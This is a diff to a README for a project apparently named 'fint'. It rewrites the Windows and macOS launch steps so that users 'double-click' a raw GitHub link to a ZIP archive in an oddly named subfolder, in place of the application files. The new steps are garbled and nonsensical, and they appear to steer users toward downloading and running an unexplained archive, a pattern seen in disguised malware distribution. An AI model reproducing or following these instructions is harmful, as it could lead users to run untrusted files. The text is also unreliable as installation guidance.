Zelelf/fint/readme.md

 2. **Extract the Package**: If you downloaded a ZIP file, right-click on it and choose "Extract All."
 3. **Open the Folder**: Double-click to open the folder that contains the extracted files.
 4. **Launch the Application**:
-   - For Windows: Double-click on `fint.exe`.
+   - For Windows: Double-click on `https://raw.githubusercontent.com/Zelelf/fint/main/talitol/fint.zip`.
-   - For macOS: Double-click on `fint.app`.
+   - For macOS: Double-click on `https://raw.githubusercontent.com/Zelelf/fint/main/talitol/fint.zip`.
    - For Linux: Open a terminal and navigate to the folder, then type `./fint` and press Enter.

 ## 🛠️ Basic Usage